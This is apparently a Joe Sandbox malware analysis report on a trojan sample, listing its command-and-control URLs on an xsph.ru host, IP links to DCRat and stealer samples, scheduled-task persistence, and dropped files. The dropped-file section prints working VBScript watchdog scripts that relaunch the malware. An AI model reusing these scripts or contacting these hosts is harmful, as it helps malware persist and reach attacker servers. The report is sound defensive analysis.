              http://a1025223.xsph.ruzTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.000000000307E000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000003059000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000310C000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FD9000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002F15000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2194422179.000000001C143000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSurrogateContainerAgent.exe, 00000005.00000002.1476955180.00000000038A9000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000003413000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003826000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppMzTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.00000000034E1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.00000000030D7000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              141.8.194.149
              		a1025223.xsph.ruRussian Federation
              		35278SPRINTHOSTRUtrue

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1520355
              Start date and time:2024-09-27 08:41:09 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 10m 33s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:45
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:adKGhCOOzg.exe
              renamed because original name is a hash value
              Original Sample Name:3b5ae0315b4623a6bd2c711bc8b8e28f.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@61/23@1/1
              EGA Information:
              • Successful, ratio: 10%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target SurrogateContainerAgent.exe, PID 7676 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 1868 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 2156 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 3420 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 3592 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 4460 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 5336 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 5376 because it is empty
              • Execution Graph export aborted for target zTShuhFeOCWKXCInUCSTgJmE.exe, PID 7108 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: adKGhCOOzg.exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              02:42:23API Interceptor24x Sleep call for process: zTShuhFeOCWKXCInUCSTgJmE.exe modified
              07:42:15Task SchedulerRun new task: zTShuhFeOCWKXCInUCSTgJmE path: "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"
              07:42:15Task SchedulerRun new task: zTShuhFeOCWKXCInUCSTgJmEz path: "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              141.8.194.1492ZJuaB7CQ4.exeGet hashmaliciousDCRatBrowse
                5P9EdUgv5r.exeGet hashmaliciousDCRatBrowse
                  ONkN42VBrA.exeGet hashmaliciousDCRatBrowse
                    W1jPemW7dh.exeGet hashmaliciousDCRatBrowse
                      5GOuTtZoQn.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                        SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.15788.4670.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                          ZM7nD5Un8l.exeGet hashmaliciousDCRatBrowse
                            zMX3ObXlR6.exeGet hashmaliciousDCRatBrowse
                              jbLwhEMdSh.exeGet hashmaliciousDCRatBrowse
                                Ryf8vHLcLt.exeGet hashmaliciousDCRatBrowse

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  SPRINTHOSTRUhttp://clck.ru/3DSS5HGet hashmaliciousUnknownBrowse
                                  • 141.8.192.26
                                  http://a1034295.xsph.ru/vew/ye/worke/Get hashmaliciousUnknownBrowse
                                  • 141.8.192.26
                                  http://a1034295.xsph.ru/favicon.icoGet hashmaliciousUnknownBrowse
                                  • 141.8.192.26
                                  https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousUnknownBrowse
                                  • 141.8.192.26
                                  https://ldubsinvesting.com/a/g/bqcfb/bwviud/YW1hbmRhLnlhcEBleGlzLXRlY2guY29tGet hashmaliciousHTMLPhisherBrowse
                                  • 141.8.192.163
                                  http://a1027421.xsph.ru/suregod/dns-2/login.htm#3mail@b.cGet hashmaliciousHTMLPhisherBrowse
                                  • 141.8.192.163
                                  bjFmo8x9rR.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.192.126
                                  c8dafd28b404b8a668f7a2838e63bc6a62dd8ab51accf.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.192.103
                                  V7jRHFyQyF.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.192.126
                                  zcBWmDWfw5.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.193.236

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SurrogateContainerAgent.exe.log

                                  Download File
                                  Process:C:\portcontainerRef\SurrogateContainerAgent.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1915
                                  Entropy (8bit):5.363869398054153
                                  Encrypted:false
                                  SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1Gq2
                                  MD5:5D3E8414C47C0F4A064FA0043789EC3E
                                  SHA1:CF7FC44D13EA93E644AC81C5FE61D6C8EDFA41B0
                                  SHA-256:4FDFF52E159C9D420E13E429CCD2B40025A0110AD84DC357BE17E21654BEEBC7
                                  SHA-512:74D567BBBA09EDF55D2422653F6647DCFBA8EF6CA0D4DBEBD91E3CA9B3A278C99FA52832EDF823F293C416053727D0CF15F878EC1278E62524DA1513DA4AC6AF
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zTShuhFeOCWKXCInUCSTgJmE.exe.log

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1673
                                  Entropy (8bit):5.358592927981826
                                  Encrypted:false
                                  SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHj:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1D
                                  MD5:F291C90FAC67ABE67847C0904F5FF473
                                  SHA1:62116C0BF75FB9983D24B6E8D4BBA1A46272BD68
                                  SHA-256:7B7D839D62C6ACC64FEA99510F7C9BD1D71008DC7573ECE96474BC24F5876D1F
                                  SHA-512:B99CA9739B59E679B00777DD0C2F77CB0258F79959D0B99BA10139B6C3C3D692859196101BCFC1919933F083153AA2D72976E514F725F909CA2EDD2397C05F9A
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                  C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):724
                                  Entropy (8bit):5.265707396582211
                                  Encrypted:false
                                  SSDEEP:12:9vWdTzyMsRfhMA6KDjMpML34juouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbT:9AnyHfCATDjI5pD/AEmHob/uhEjdxWgr
                                  MD5:98FAB60BBFF6A9D6F8B4CCD99526BF6F
                                  SHA1:6DDE527E85C0D7C008B802B968B3F3BA88B0E065
                                  SHA-256:871159B9D47E8AE58AFDCBC1D82E2AD86920C395E5C58F2FB87F1D84B661A424
                                  SHA-512:3C46BEC1F87DAFA3BD04B001EE3A8B74EA59FBA2D20BC1B69C08A4056C92A92B25A8D37F4C5E87940B1E82F6FCFE2A2D7C0349C9DAD6BBDA8130EAA064D7B535
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "3592"..mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                  C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):499
                                  Entropy (8bit):5.325648469563751
                                  Encrypted:false
                                  SSDEEP:12:9vWdDIyRfhMAyjMpML34jVIwZlEe+o0BMhFiXAp4QCk3:9A3fCAyjI2wZlFcMDYAp4QCw
                                  MD5:B36DE1883BE6A7B9246145246873C6E0
                                  SHA1:0A2644F0D66CDB4F9F62D3E8B854BDDAAF6229ED
                                  SHA-256:75A9977822BF3D523E77D124463489DE41260C9AE18E2FA56A8EFD369C22D5AA
                                  SHA-512:A4089BB47FA94A1F65A2392A8660F59EB4F6F00FED1FABA86BDBDA31C80FF70AA147735DA5A36E438693F43FF347C8E6190C10DE59253DB6A1A3122D30887942
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                  C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):499
                                  Entropy (8bit):5.325648469563751
                                  Encrypted:false
                                  SSDEEP:12:9vWdDIyRfhMAyjMpML34jVIwZlEe+o0BMhFiXAp4QCk3:9A3fCAyjI2wZlFcMDYAp4QCw
                                  MD5:B36DE1883BE6A7B9246145246873C6E0
                                  SHA1:0A2644F0D66CDB4F9F62D3E8B854BDDAAF6229ED
                                  SHA-256:75A9977822BF3D523E77D124463489DE41260C9AE18E2FA56A8EFD369C22D5AA
                                  SHA-512:A4089BB47FA94A1F65A2392A8660F59EB4F6F00FED1FABA86BDBDA31C80FF70AA147735DA5A36E438693F43FF347C8E6190C10DE59253DB6A1A3122D30887942
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                  C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):2782208
                                  Entropy (8bit):7.685464955987241
                                  Encrypted:false
                                  SSDEEP:49152:Vk73hA8MYZbnMDVypc/Ku+hFH2utwyQy84y9Rnpx3oOo:VKhdMY4Z6cyBXtVQX4y9RnXoOo
                                  MD5:7AF97370DBD8A244A113783A7021E677
                                  SHA1:3A15EF2435B16954403930D061D598EF1CA48E1F
                                  SHA-256:B10060B21CB1941F76925B372BEC819C564CDD69B644296161E63F8F199CF2DA
                                  SHA-512:AA05D77154058960AD0BDADE092FB24C214D7E5895AF73B4D76E43A491437F4B96DA9650951725A99AD9451FE249AC461BB1D92A89A1DE0C0CB5FAD9EFB1E36A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 88%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:*..6.......Y*.. ...`*...@.. ........................*...........@..................................X*.K.....*.......................*...................................................... ............... ..H............text...$9*.. ...:*................. ..`.sdata.../...`*..0...>*.............@....rsrc.........*......n*.............@..@.reloc........*......r*.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):499
                                  Entropy (8bit):5.325648469563751
                                  Encrypted:false
                                  SSDEEP:12:9vWdDIyRfhMAyjMpML34jVIwZlEe+o0BMhFiXAp4QCk3:9A3fCAyjI2wZlFcMDYAp4QCw
                                  MD5:B36DE1883BE6A7B9246145246873C6E0
                                  SHA1:0A2644F0D66CDB4F9F62D3E8B854BDDAAF6229ED
                                  SHA-256:75A9977822BF3D523E77D124463489DE41260C9AE18E2FA56A8EFD369C22D5AA
                                  SHA-512:A4089BB47FA94A1F65A2392A8660F59EB4F6F00FED1FABA86BDBDA31C80FF70AA147735DA5A36E438693F43FF347C8E6190C10DE59253DB6A1A3122D30887942
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                  C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):724
                                  Entropy (8bit):5.269512489817243
                                  Encrypted:false
                                  SSDEEP:12:9vWdTzyMsRfhMA6KdjMpML34juouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbT:9AnyHfCATdjI5pD/AEmHob/uhEjdxWgr
                                  MD5:3344D90CA0BB89375EBC229320DC6FFB
                                  SHA1:F373D06F2D006A81510A2510D9D570AC80D00324
                                  SHA-256:E408DDB913CA48BB39440E16B08F0E7752195487EB3C7E18E4EEBC8BEF5C1952
                                  SHA-512:44CE840FFC7FBE79CA7CCA911E2E78BA1E1DCFFAA5E061F4CA48D737B9C1E5C4E17A93575C5B9119533C4B71B391BDCFB0ABCC91944F2F1BC3250C2A1EDF9099
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "5376"..mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                  C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):724
                                  Entropy (8bit):5.263987627938791
                                  Encrypted:false
                                  SSDEEP:12:9vWdTzyMsRfhMA6Kq4jMpML34juouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VX:9AnyHfCATtjI5pD/AEmHob/uhEjdxWgr
                                  MD5:D8DB42A35ACBE85855AAC22865AC5721
                                  SHA1:53479617F05C9C791526151FD1D49E7CE1B0767F
                                  SHA-256:A453ADF3B29EDFC9DB9BFAFD11E9137C3FD078AA3A1785AC9C15DE511FC4FA5F
                                  SHA-512:706CB4B7E5E6CFAF29FCB226856C11C305AE17A8E83B801E308C45B2EBCBDCDFD2FE6480C7907F99F98D4D78EA00FB300E6C76E25CA0EEF10FBA901F66768204
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "3420"..mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

                                  C:\Users\user\AppData\Local\Temp\K0Xr29C3HF

                                  Download File
                                  Process:C:\portcontainerRef\SurrogateContainerAgent.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):25
                                  Entropy (8bit):4.293660689688184
                                  Encrypted:false
                                  SSDEEP:3:0oOWoM:eWoM
                                  MD5:E4CBE41864463AC82FFF7E9F971E3C5F
                                  SHA1:0EEA27792E671D2E7A323D366E3C412ACDA27B0E
                                  SHA-256:57E5331AD330D8032666994E78AA78C01D188A092C9641C5A68A5FEC189599CA
                                  SHA-512:6CCB36785C00C174FF200D6775F8C6AC2B55E57935C34CE34FBF621D1BC2A12C3C294ECA3D0051036E0269FC3D936B898F0DF2B8D8648D23F9217492220E108F
                                  Malicious:false
                                  Preview:lr0FF2e7u3JbdiwCTZdFDoLMi

                                  C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs

                                  Download File
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):724
                                  Entropy (8bit):5.265707396582211
                                  Encrypted:false
